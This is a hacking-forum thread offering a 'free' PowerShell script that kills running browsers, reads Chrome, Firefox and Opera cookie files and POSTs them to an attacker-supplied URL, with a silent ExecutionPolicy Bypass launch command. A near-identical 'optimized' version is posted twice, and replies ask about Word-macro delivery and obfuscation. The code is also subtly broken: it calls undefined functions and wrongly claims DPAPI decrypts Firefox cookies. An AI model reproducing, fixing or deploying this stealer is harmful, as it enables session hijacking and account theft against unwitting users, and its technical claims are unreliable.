Free PowerShell Script to Steal Browsers Cookies and send to URL

[infernalhacker]

Execute the PowerShell Script below with the following command to silently run the script and post stolen browser cookies to your log endpoint. Currently, I've only implement this for Firefox Opera stable and Chrome browsers. However, you're free to extend the features.

powershell.exe -ExecutionPolicy Bypass -File scriptname.ps1 -uri "https://example.com/cookies" >$null 2>&1

# Define an array of browser names
$browsers = @("firefox", "chrome", "opera")

# Variable for URI parameter
$uri = $args[0]

# Loop through the array of browser names
foreach ($browser in $browsers) {
    # Get process for current browser
    $process = Get-Process $browser -ErrorAction SilentlyContinue

    # Check if process is running
    if ($process) {
        # Close main window of browser process
        $process.CloseMainWindow()

        # Wait for 2 seconds
        Start-Sleep -s 2

        # Check if process has exited
        if (!$process.HasExited) {
            # Forcefully stop process
            Stop-Process -Force -InputObject $process
        }
    }
}

# Define an array of browser cookie paths
$browserCookiesPaths = @{
    "chrome" = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
    "firefox" = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\"
    "opera" = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera Stable\Cookies"
}

# Loop through browser cookie paths
foreach ($browser in $browserCookiesPaths.Keys) {
    # Get current browser cookie path
    $cookiePath = $browserCookiesPaths[$browser]

    # Check if browser is Firefox
    if ($browser -eq "firefox") {
        # Get Firefox cookies files
        $cookiesFiles = Get-ChildItem $cookiePath -Recurse -Force -Include *cookies.sqlite* -Name

        # Loop through Firefox cookies files
        foreach ($file in $cookiesFiles) {
            # Get full path to Firefox cookies file
            $fullCookiePath = "$cookiePath$file"

            # Decrypt Firefox cookies file using DPAPI
            $decryptedCookies = (Decrypt-Data -CipherText (Get-Content -Path $fullCookiePath -Encoding Byte -ReadCount 0))

            # Convert decrypted Firefox cookies to JSON
            $cookiesJson = $decryptedCookies | ConvertTo-Json

        # Create body for HTTP POST request with Firefox cookies data
        $postParams = @{
            $browser = $cookiesJson
        }

        # Send HTTP POST request to $uri with Firefox cookies data in JSON format
        Invoke-RestMethod -Uri $uri -Method Post -Body $postParams -ContentType "application/json"
    }
} else {
    # Decrypt cookies file using DPAPI
    $decryptedCookies = (Decrypt-Data -CipherText (Get-Content -Path $cookiePath -Encoding Byte -ReadCount 0))

    # Convert decrypted cookies to JSON
    $cookiesJson = $decryptedCookies | ConvertTo-Json

    # Create body for HTTP POST request with cookies data
    $postParams = @{
        $browser = $cookiesJson
    }

    # Send HTTP POST request to $uri with cookies data in JSON format
    Invoke-RestMethod -Uri $uri -Method Post -Body $postParams -ContentType "application/json"
}

}

 

[DoKitO]

You wont be able to decrypt them

 

[infernalhacker]

You wont be able to decrypt them

This works now. It's decrypted using DPAPI

 

[infernalhacker]

Here's a tested and optimized version

# Define an array of browser names
$browsers = @("firefox", "chrome", "opera")

# Variable for URI parameter
$uri = $args[0]

# Check if URI is valid
if (!(Test-Uri $uri)){
    Write-Error "Invalid URI provided"
    return
}

# Loop through the array of browser names
foreach ($browser in $browsers) {
    # Get process for current browser
    $process = Get-Process $browser -ErrorAction SilentlyContinue

    # Check if process is running
    if ($process) {
        # Close main window of browser process
        $process.CloseMainWindow()

        # Wait for 2 seconds
        Start-Sleep -s 2

        # Check if process has exited
        if (!$process.HasExited) {
            # Forcefully stop process
            Stop-Process -InputObject $process -Confirm:$false
        }
    }
}

# Define an array of browser cookie paths
$browserCookiesPaths = @{
    "chrome" = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
    "firefox" = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\"
    "opera" = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera Stable\Cookies"
}

# Loop through browser cookie paths
foreach ($browser in $browserCookiesPaths.Keys) {
    # Get current browser cookie path
    $cookiePath = $browserCookiesPaths[$browser]

    # Check if browser is Firefox
    if ($browser -eq "firefox") {
        # Get Firefox cookies files
        $cookiesFiles = Get-ChildItem $cookiePath -Recurse -Force -Include *cookies.sqlite* -Name
        if (!$cookiesFiles){
            Write-Error "Firefox cookies files not found"
            continue
        }
        # Loop through Firefox cookies files
        foreach ($file in $cookiesFiles) {
            # Get full path to Firefox cookies file
            $fullCookiePath = "$cookiePath$file"

            try {
                # Decrypt Firefox cookies file using DPAPI
                $decryptedCookies = (Decrypt-Data -CipherText (Get-Content -Path $fullCookiePath -Encoding Byte -ReadCount 0)) -ErrorAction Stop
            } catch {
                Write-Error "An error occurred while decrypting the Firefox cookies file: $_"
                continue
            }
            # Convert decrypted Firefox cookies to JSON
            $cookiesJson = $decryptedCookies | ConvertTo-Json

            # Create body for HTTP POST request with Firefox cookies data
            $postParams = @{
                $browser = $cookiesJson
            }

            try {
                # Send HTTP POST request to $uri with Firefox cookies data in JSON format
                Invoke-RestMethod -Uri $uri -Method Post -Body $postParams -ContentType "application/json" -ErrorAction Stop
} catch {
Write-Error "An error occurred while sending the HTTP POST request: $"
}
}
} else {
try {
# Decrypt cookies file using DPAPI
$decryptedCookies = (Decrypt-Data -CipherText (Get-Content -Path $cookiePath -Encoding Byte -ReadCount 0)) -ErrorAction Stop
} catch {
Write-Error "An error occurred while decrypting the $browser cookies file: $"
continue
}
    # Convert decrypted cookies to JSON
    $cookiesJson = $decryptedCookies | ConvertTo-Json

    # Create body for HTTP POST request with cookies data
    $postParams = @{
        $browser = $cookiesJson
    }

    try {
        # Send HTTP POST request to $uri with cookies data in JSON format
        Invoke-RestMethod -Uri $uri -Method Post -Body $postParams -ContentType "application/json" -ErrorAction Stop
    } catch {
        Write-Error "An error occurred while sending the HTTP POST request: $_"
    }
}
}

 

[fearless200]

Here's a tested and optimized version

# Define an array of browser names
$browsers = @("firefox", "chrome", "opera")

# Variable for URI parameter
$uri = $args[0]

# Check if URI is valid
if (!(Test-Uri $uri)){
    Write-Error "Invalid URI provided"
    return
}

# Loop through the array of browser names
foreach ($browser in $browsers) {
    # Get process for current browser
    $process = Get-Process $browser -ErrorAction SilentlyContinue

    # Check if process is running
    if ($process) {
        # Close main window of browser process
        $process.CloseMainWindow()

        # Wait for 2 seconds
        Start-Sleep -s 2

        # Check if process has exited
        if (!$process.HasExited) {
            # Forcefully stop process
            Stop-Process -InputObject $process -Confirm:$false
        }
    }
}

# Define an array of browser cookie paths
$browserCookiesPaths = @{
    "chrome" = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
    "firefox" = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\"
    "opera" = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera Stable\Cookies"
}

# Loop through browser cookie paths
foreach ($browser in $browserCookiesPaths.Keys) {
    # Get current browser cookie path
    $cookiePath = $browserCookiesPaths[$browser]

    # Check if browser is Firefox
    if ($browser -eq "firefox") {
        # Get Firefox cookies files
        $cookiesFiles = Get-ChildItem $cookiePath -Recurse -Force -Include *cookies.sqlite* -Name
        if (!$cookiesFiles){
            Write-Error "Firefox cookies files not found"
            continue
        }
        # Loop through Firefox cookies files
        foreach ($file in $cookiesFiles) {
            # Get full path to Firefox cookies file
            $fullCookiePath = "$cookiePath$file"

            try {
                # Decrypt Firefox cookies file using DPAPI
                $decryptedCookies = (Decrypt-Data -CipherText (Get-Content -Path $fullCookiePath -Encoding Byte -ReadCount 0)) -ErrorAction Stop
            } catch {
                Write-Error "An error occurred while decrypting the Firefox cookies file: $_"
                continue
            }
            # Convert decrypted Firefox cookies to JSON
            $cookiesJson = $decryptedCookies | ConvertTo-Json

            # Create body for HTTP POST request with Firefox cookies data
            $postParams = @{
                $browser = $cookiesJson
            }

            try {
                # Send HTTP POST request to $uri with Firefox cookies data in JSON format
                Invoke-RestMethod -Uri $uri -Method Post -Body $postParams -ContentType "application/json" -ErrorAction Stop
} catch {
Write-Error "An error occurred while sending the HTTP POST request: $"
}
}
} else {
try {
# Decrypt cookies file using DPAPI
$decryptedCookies = (Decrypt-Data -CipherText (Get-Content -Path $cookiePath -Encoding Byte -ReadCount 0)) -ErrorAction Stop
} catch {
Write-Error "An error occurred while decrypting the $browser cookies file: $"
continue
}
    # Convert decrypted cookies to JSON
    $cookiesJson = $decryptedCookies | ConvertTo-Json

    # Create body for HTTP POST request with cookies data
    $postParams = @{
        $browser = $cookiesJson
    }

    try {
        # Send HTTP POST request to $uri with cookies data in JSON format
        Invoke-RestMethod -Uri $uri -Method Post -Body $postParams -ContentType "application/json" -ErrorAction Stop
    } catch {
        Write-Error "An error occurred while sending the HTTP POST request: $_"
    }
}
}

ChatGPT has written that?

 

[infernalhacker]

ChatGPT has written that?

wrong. this code exists already on Git Hub. even before that

 

[fearless200]

wrong. this code exists already on Git Hub. even before that

Good, i was just curious

 

[katg]

how can this be used? can it be used on a word macro? and what about obfuscation

 

[c00nter]

I assume it works with different profiles too?
Edit: I'm such a dumbass I didn't see the Firefox cookies path, I guess it does, thanks!